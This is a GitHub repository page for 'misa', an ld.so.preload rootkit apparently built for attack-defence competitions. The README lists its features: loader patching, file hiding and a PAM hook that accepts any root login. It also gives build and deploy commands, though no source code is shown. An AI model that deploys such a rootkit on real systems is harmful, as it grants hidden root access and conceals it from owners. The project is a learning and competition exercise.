Skip to content

ziggoon/misa

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.cargo
.cargo
 
 
access
access
 
 
chdir
chdir
 
 
config
config
 
 
deploy
deploy
 
 
exec
exec
 
 
misa
misa
 
 
open
open
 
 
pam
pam
 
 
readdir
readdir
 
 
src
src
 
 
stat
stat
 
 
unlink
unlink
 
 
.gitignore
.gitignore
 
 
Cargo.lock
Cargo.lock
 
 
Cargo.toml
Cargo.toml
 
 
README.md
README.md
 
 

Repository files navigation

misa

misa is an ld.so.preload rootkit designed for use in competition environments. heavily influenced by father and medusa

overview

misa hooks a variety of libc functions to establish and maintain persistence on a host. the rootkit can be deployed by installing the shared object manually or by utilizing the deployment binary (recommended).

features

  • dynamic loader patching to point to custom preload location
  • file / directory hiding
  • pam hook to always accept auth as root

usage

clone repo: git clone https://github.com/ziggoon/misa
build rootkit: cd misa; cargo build --release; cd deploy; cargo build --release

the deployment binary will be compiled to misa/deploy/target/release/deploy with the malicious .so embedded
deploy: ./deploy load
unload: ./deploy unload

notice

i mainly used this project to learn more about linux, libc, and ld.so.preload rootkits. not really stable currently
i have not tested this on anything other than 6.x kernels

WORK IN PROGRESS !!

About

ld preload rootkit ?

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages